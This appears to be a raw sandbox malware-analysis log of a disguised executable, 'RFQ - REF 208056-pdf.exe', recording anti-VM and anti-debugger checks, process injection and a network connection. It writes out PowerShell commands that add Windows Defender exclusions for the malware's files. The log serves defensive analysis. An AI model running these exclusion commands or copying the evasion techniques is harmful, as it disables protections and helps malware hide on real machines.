                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX

                      Malware Analysis System Evasion:

                      barindex
                      Tries to delay execution (extensive OutputDebugStringW loop)Show sources
                      Source: C:\Users\user\Desktop\RFQ - REF 208056-pdf.exeSection loaded: OutputDebugStringW count: 1933
                      Source: C:\Windows\Microsoft.NET\Framework\fEPqNDVRKakftSbrsO\svchost.exeSection loaded: OutputDebugStringW count: 1937
                      Source: C:\Windows\explorer.exeFile opened / queried: SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#5&280b647&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 4594
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 2345
                      Source: C:\Windows\System32\svchost.exe TID: 6860Thread sleep time: -30000s >= -30000s
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 5236Thread sleep time: -14757395258967632s >= -30000s
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 5236Thread sleep time: -922337203685477s >= -30000s
                      Source: C:\Windows\System32\conhost.exe TID: 6760Thread sleep count: 67 > 30
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 6212Thread sleep time: -4611686018427385s >= -30000s
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 6212Thread sleep time: -922337203685477s >= -30000s
                      Source: C:\Windows\System32\svchost.exeFile opened: PhysicalDrive0
                      Source: C:\Windows\System32\conhost.exeLast function: Thread delayed
                      Source: powershell.exe, 00000009.00000003.517902896.0000000005964000.00000004.00000001.sdmpBinary or memory string: Hyper-V
                      Source: svchost.exe, 00000003.00000002.519119102.000002451B6C0000.00000002.00000001.sdmpBinary or memory string: A Virtual Machine could not be started because Hyper-V is not installed.
                      Source: explorer.exe, 0000000F.00000002.512322019.0000000001329000.00000004.00000020.sdmpBinary or memory string: \??\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#5&280b647&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}b8b}\
                      Source: explorer.exe, 0000000F.00000002.512322019.0000000001329000.00000004.00000020.sdmpBinary or memory string: \??\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#5&280b647&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\b8b}\
                      Source: svchost.exe, 00000002.00000002.530073283.000001EAA1C4D000.00000004.00000001.sdmpBinary or memory string: Hyper-V RAW
                      Source: svchost.exe, 00000002.00000002.505437886.000001EA9C629000.00000004.00000001.sdmpBinary or memory string: Hyper-V RAW@0
                      Source: svchost.exe, 00000003.00000002.519119102.000002451B6C0000.00000002.00000001.sdmpBinary or memory string: A communication protocol error has occurred between the Hyper-V Host and Guest Compute Service.
                      Source: svchost.exe, 00000003.00000002.519119102.000002451B6C0000.00000002.00000001.sdmpBinary or memory string: The communication protocol version between the Hyper-V Host and Guest Compute Services is not supported.
                      Source: explorer.exe, 0000000F.00000002.512322019.0000000001329000.00000004.00000020.sdmpBinary or memory string: \??\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#5&280b647&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\Device\CdRom0\??\Volume{e6e9dfd8-98f2-11e9-90ce-806e6f6e6963}\DosDevices\D:DB
                      Source: svchost.exe, 00000003.00000002.515379536.000002451B067000.00000004.00000001.sdmp, svchost.exe, 00000004.00000002.504484042.0000027C99E29000.00000004.00000001.sdmpBinary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dll
                      Source: svchost.exe, 00000003.00000002.519119102.000002451B6C0000.00000002.00000001.sdmpBinary or memory string: An unknown internal message was received by the Hyper-V Compute Service.
                      Source: powershell.exe, 00000009.00000003.517902896.0000000005964000.00000004.00000001.sdmp, powershell.exe, 00000011.00000002.524764005.0000000005201000.00000004.00000001.sdmpBinary or memory string: l:C:\Windows\system32\WindowsPowerShell\v1.0\Modules\Hyper-V
                      Source: C:\Users\user\Desktop\RFQ - REF 208056-pdf.exeProcess information queried: ProcessInformation

                      Anti Debugging:

                      barindex
                      Hides threads from debuggersShow sources
                      Source: C:\Users\user\Desktop\RFQ - REF 208056-pdf.exeThread information set: HideFromDebugger
                      Source: C:\Users\user\Desktop\RFQ - REF 208056-pdf.exeThread information set: HideFromDebugger
                      Source: C:\Users\user\Desktop\RFQ - REF 208056-pdf.exeThread information set: HideFromDebugger
                      Source: C:\Users\user\Desktop\RFQ - REF 208056-pdf.exeThread information set: HideFromDebugger
                      Source: C:\Users\user\Desktop\RFQ - REF 208056-pdf.exeThread information set: HideFromDebugger
                      Source: C:\Users\user\Desktop\RFQ - REF 208056-pdf.exeThread information set: HideFromDebugger
                      Source: C:\Users\user\Desktop\RFQ - REF 208056-pdf.exeThread information set: HideFromDebugger
                      Source: C:\Users\user\Desktop\RFQ - REF 208056-pdf.exeThread information set: HideFromDebugger
                      Source: C:\Users\user\Desktop\RFQ - REF 208056-pdf.exeThread information set: HideFromDebugger
                      Source: C:\Users\user\Desktop\RFQ - REF 208056-pdf.exeThread information set: HideFromDebugger
                      Source: C:\Users\user\Desktop\RFQ - REF 208056-pdf.exeThread information set: HideFromDebugger
                      Source: C:\Users\user\Desktop\RFQ - REF 208056-pdf.exeThread information set: HideFromDebugger
                      Source: C:\Users\user\Desktop\RFQ - REF 208056-pdf.exeThread information set: HideFromDebugger
                      Source: C:\Users\user\Desktop\RFQ - REF 208056-pdf.exeThread information set: HideFromDebugger
                      Source: C:\Users\user\AppData\Local\Temp\3f77e94d-b01b-49a3-88ba-e6fd38451fb3\AdvancedRun.exeCode function: 11_2_0040289F LoadLibraryW,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,
                      Source: C:\Users\user\Desktop\RFQ - REF 208056-pdf.exeProcess token adjusted: Debug
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess token adjusted: Debug
                      Source: C:\Users\user\AppData\Local\Temp\3f77e94d-b01b-49a3-88ba-e6fd38451fb3\AdvancedRun.exeProcess token adjusted: Debug
                      Source: C:\Users\user\AppData\Local\Temp\3f77e94d-b01b-49a3-88ba-e6fd38451fb3\AdvancedRun.exeProcess token adjusted: Debug
                      Source: C:\Windows\Microsoft.NET\Framework\fEPqNDVRKakftSbrsO\svchost.exeProcess token adjusted: Debug
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess token adjusted: Debug
                      Source: C:\Users\user\Desktop\RFQ - REF 208056-pdf.exeMemory allocated: page read and write | page guard

                      HIPS / PFW / Operating System Protection Evasion:

                      barindex
                      System process connects to network (likely due to code injection or exploit)Show sources
                      Source: C:\Windows\Microsoft.NET\Framework\fEPqNDVRKakftSbrsO\svchost.exeNetwork Connect: 172.67.172.17 80
                      Adds a directory exclusion to Windows DefenderShow sources
                      Source: unknownProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe 'C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe' Add-MpPreference -ExclusionPath 'C:\Windows\Microsoft.NET\Framework\fEPqNDVRKakftSbrsO\svchost.exe' -Force
                      Source: unknownProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe 'C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe' Add-MpPreference -ExclusionPath 'C:\Users\user\Desktop\RFQ - REF 208056-pdf.exe' -Force
                      Source: C:\Users\user\Desktop\RFQ - REF 208056-pdf.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe 'C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe' Add-MpPreference -ExclusionPath 'C:\Windows\Microsoft.NET\Framework\fEPqNDVRKakftSbrsO\svchost.exe' -Force
                      Source: C:\Users\user\Desktop\RFQ - REF 208056-pdf.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe 'C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe' Add-MpPreference -ExclusionPath 'C:\Users\user\Desktop\RFQ - REF 208056-pdf.exe' -Force
                      Injects a PE file into a foreign processesShow sources
                      Source: C:\Users\user\Desktop\RFQ - REF 208056-pdf.exeMemory written: C:\Users\user\Desktop\RFQ - REF 208056-pdf.exe base: 400000 value starts with: 4D5A
                      Source: C:\Users\user\AppData\Local\Temp\3f77e94d-b01b-49a3-88ba-e6fd38451fb3\AdvancedRun.exeCode function: 11_2_00401C26 GetCurrentProcessId,memset,memset,_snwprintf,memset,ShellExecuteExW,WaitForSingleObject,GetExitCodeProcess,GetLastError,
                      Source: C:\Users\user\Desktop\RFQ - REF 208056-pdf.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe 'C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe' Add-MpPreference -ExclusionPath 'C:\Windows\Microsoft.NET\Framework\fEPqNDVRKakftSbrsO\svchost.exe' -Force
                      Source: C:\Users\user\Desktop\RFQ - REF 208056-pdf.exeProcess created: C:\Users\user\AppData\Local\Temp\3f77e94d-b01b-49a3-88ba-e6fd38451fb3\AdvancedRun.exe 'C:\Users\user\AppData\Local\Temp\3f77e94d-b01b-49a3-88ba-e6fd38451fb3\AdvancedRun.exe' /EXEFilename 'C:\Users\user\AppData\Local\Temp\3f77e94d-b01b-49a3-88ba-e6fd38451fb3\test.bat' /WindowState ''0'' /PriorityClass ''32'' /CommandLine '' /StartDirectory '' /RunAs 8 /Run
                      Source: C:\Users\user\Desktop\RFQ - REF 208056-pdf.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe 'C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe' Add-MpPreference -ExclusionPath 'C:\Users\user\Desktop\RFQ - REF 208056-pdf.exe' -Force
                      Source: C:\Users\user\Desktop\RFQ - REF 208056-pdf.exeProcess created: C:\Windows\SysWOW64\cmd.exe 'C:\Windows\System32\cmd.exe' /c timeout 1
                      Source: C:\Users\user\Desktop\RFQ - REF 208056-pdf.exeProcess created: C:\Users\user\Desktop\RFQ - REF 208056-pdf.exe C:\Users\user\Desktop\RFQ - REF 208056-pdf.exe
                      Source: C:\Users\user\AppData\Local\Temp\3f77e94d-b01b-49a3-88ba-e6fd38451fb3\AdvancedRun.exeProcess created: C:\Users\user\AppData\Local\Temp\3f77e94d-b01b-49a3-88ba-e6fd38451fb3\AdvancedRun.exe 'C:\Users\user\AppData\Local\Temp\3f77e94d-b01b-49a3-88ba-e6fd38451fb3\AdvancedRun.exe' /SpecialRun 4101d8 5504
                      Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\timeout.exe timeout 1
                      Source: unknownProcess created: C:\Users\user\AppData\Local\Temp\3f77e94d-b01b-49a3-88ba-e6fd38451fb3\AdvancedRun.exe 'C:\Users\user\AppData\Local\Temp\3f77e94d-b01b-49a3-88ba-e6fd38451fb3\AdvancedRun.exe' /EXEFilename 'C:\Users\user\AppData\Local\Temp\3f77e94d-b01b-49a3-88ba-e6fd38451fb3\test.bat' /WindowState ''0'' /PriorityClass ''32'' /CommandLine '' /StartDirectory '' /RunAs 8 /Run
                      Source: C:\Users\user\Desktop\RFQ - REF 208056-pdf.exeProcess created: C:\Users\user\AppData\Local\Temp\3f77e94d-b01b-49a3-88ba-e6fd38451fb3\AdvancedRun.exe 'C:\Users\user\AppData\Local\Temp\3f77e94d-b01b-49a3-88ba-e6fd38451fb3\AdvancedRun.exe' /EXEFilename 'C:\Users\user\AppData\Local\Temp\3f77e94d-b01b-49a3-88ba-e6fd38451fb3\test.bat' /WindowState ''0'' /PriorityClass ''32'' /CommandLine '' /StartDirectory '' /RunAs 8 /Run
                      Source: powershell.exe, 00000009.00000002.536326386.0000000003B60000.00000002.00000001.sdmp, explorer.exe, 0000000F.00000002.515784160.00000000019E0000.00000002.00000001.sdmpBinary or memory string: uProgram Manager
                      Source: powershell.exe, 00000009.00000002.536326386.0000000003B60000.00000002.00000001.sdmp, explorer.exe, 0000000F.00000002.515784160.00000000019E0000.00000002.00000001.sdmpBinary or memory string: Shell_TrayWnd
                      Source: powershell.exe, 00000009.00000002.536326386.0000000003B60000.00000002.00000001.sdmp, explorer.exe, 0000000F.00000002.515784160.00000000019E0000.00000002.00000001.sdmpBinary or memory string: Progman
                      Source: powershell.exe, 00000009.00000002.536326386.0000000003B60000.00000002.00000001.sdmp, explorer.exe, 0000000F.00000002.515784160.00000000019E0000.00000002.00000001.sdmpBinary or memory string: Progmanlock
                      Source: C:\Users\user\Desktop\RFQ - REF 208056-pdf.exeQueries volume information: C:\Users\user\Desktop\RFQ - REF 208056-pdf.exe VolumeInformation
                      Source: C:\Users\user\Desktop\RFQ - REF 208056-pdf.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Windows.Forms\v4.0_4.0.0.0__b77a5c561934e089\System.Windows.Forms.dll VolumeInformation
                      Source: C:\Users\user\Desktop\RFQ - REF 208056-pdf.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.VisualBasic\v4.0_10.0.0.0__b03f5f7f11d50a3a\Microsoft.VisualBasic.dll VolumeInformation
                      Source: C:\Users\user\Desktop\RFQ - REF 208056-pdf.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Drawing\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Drawing.dll VolumeInformation
                      Source: C:\Users\user\Desktop\RFQ - REF 208056-pdf.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Accessibility\v4.0_4.0.0.0__b03f5f7f11d50a3a\Accessibility.dll VolumeInformation
                      Source: C:\Windows\System32\svchost.exeQueries volume information: C:\ProgramData\Microsoft\Network\Downloader\edb.chk VolumeInformation
                      Source: C:\Windows\System32\svchost.exeQueries volume information: C:\ProgramData\Microsoft\Network\Downloader\edb.log VolumeInformation
                      Source: C:\Windows\System32\svchost.exeQueries volume information: C:\ProgramData\Microsoft\Network\Downloader\edb.chk VolumeInformation
                      Source: C:\Windows\System32\svchost.exeQueries volume information: C:\ProgramData\Microsoft\Network\Downloader\edb.log VolumeInformation
                      Source: C:\Windows\System32\svchost.exeQueries volume information: C:\ProgramData\Microsoft\Network\Downloader\edb.log VolumeInformation
                      Source: C:\Windows\System32\svchost.exeQueries volume information: C:\ProgramData\Microsoft\Network\Downloader\edb.log VolumeInformation
                      Source: C:\Windows\System32\svchost.exeQueries volume information: C:\ProgramData\Microsoft\Network\Downloader\edb.chk VolumeInformation
                      Source: C:\Windows\System32\svchost.exeQueries volume information: C:\ProgramData\Microsoft\Network\Downloader\qmgr.db VolumeInformation
                      Source: C:\Windows\System32\svchost.exeQueries volume information: C:\ProgramData\Microsoft\Network\Downloader\qmgr.jfm VolumeInformation
                      Source: C:\Windows\System32\svchost.exeQueries volume information: C:\ProgramData\Microsoft\Network\Downloader\qmgr.db VolumeInformation
                      Source: C:\Windows\System32\svchost.exeQueries volume information: C:\ProgramData\Microsoft\Network\Downloader\qmgr.db VolumeInformation
                      Source: C:\Windows\System32\svchost.exeQueries volume information: C:\ VolumeInformation
                      Source: C:\Windows\System32\svchost.exeQueries volume information: C:\ VolumeInformation
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.PowerShell.ConsoleHost\v4.0_3.0.0.0__31bf3856ad364e35\Microsoft.PowerShell.ConsoleHost.dll VolumeInformation
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Management.Automation\v4.0_3.0.0.0__31bf3856ad364e35\System.Management.Automation.dll VolumeInformation
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Numerics\v4.0_4.0.0.0__b77a5c561934e089\System.Numerics.dll VolumeInformation
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.DirectoryServices\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.DirectoryServices.dll VolumeInformation
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Management\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Management.dll VolumeInformation
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package00113~31bf3856ad364e35~amd64~~10.0.17134.1.cat VolumeInformation
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.PowerShell.Security\v4.0_3.0.0.0__31bf3856ad364e35\Microsoft.PowerShell.Security.dll VolumeInformation
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformation
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package00113~31bf3856ad364e35~amd64~~10.0.17134.1.cat VolumeInformation
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-GroupPolicy-ClientTools-WOW64-ds-Package~31bf3856ad364e35~amd64~~10.0.17134.1.cat VolumeInformation
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-AppManagement-AppV-WOW64-Package~31bf3856ad364e35~amd64~~10.0.17134.1.cat VolumeInformation
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\Microsoft.Management.Infrastructure.Native\v4.0_1.0.0.0__31bf3856ad364e35\Microsoft.Management.Infrastructure.Native.dll VolumeInformation
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\AppvClient\Microsoft.AppV.AppVClientPowerShell.dll VolumeInformation
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformation
